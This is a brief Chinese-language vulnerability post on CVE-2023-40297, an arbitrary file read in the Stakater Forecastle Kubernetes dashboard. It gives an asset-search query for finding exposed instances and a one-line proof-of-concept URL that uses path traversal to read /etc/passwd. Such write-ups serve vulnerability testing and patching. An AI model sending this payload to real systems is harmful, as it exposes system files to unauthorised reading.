Stakater Forecastle任意文件读取漏洞（cve-2023-40297）

Stakater Forecastle任意文件读取漏洞（cve-2023-40297）

一、免责声明：

本次文章仅限个人学习使用，如有非法用途均与作者无关，且行且珍惜；由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，公众号望雪阁及作者不为此承担任何责任，一旦造成后果请自行承担！如有侵权烦请告知，我们会立即删除整改并向您致以歉意。谢谢！

二、产品介绍：

Stakater Forecastle是一个控制面板。它动态发现并提供一个启动板来访问部署在Kuberneters上的应用程序。

三、资产梳理：

title=“forecastle” && title=“stakater”

四、漏洞复现：

五、POC：

https://127.0.0.1/%5c../etc/passwd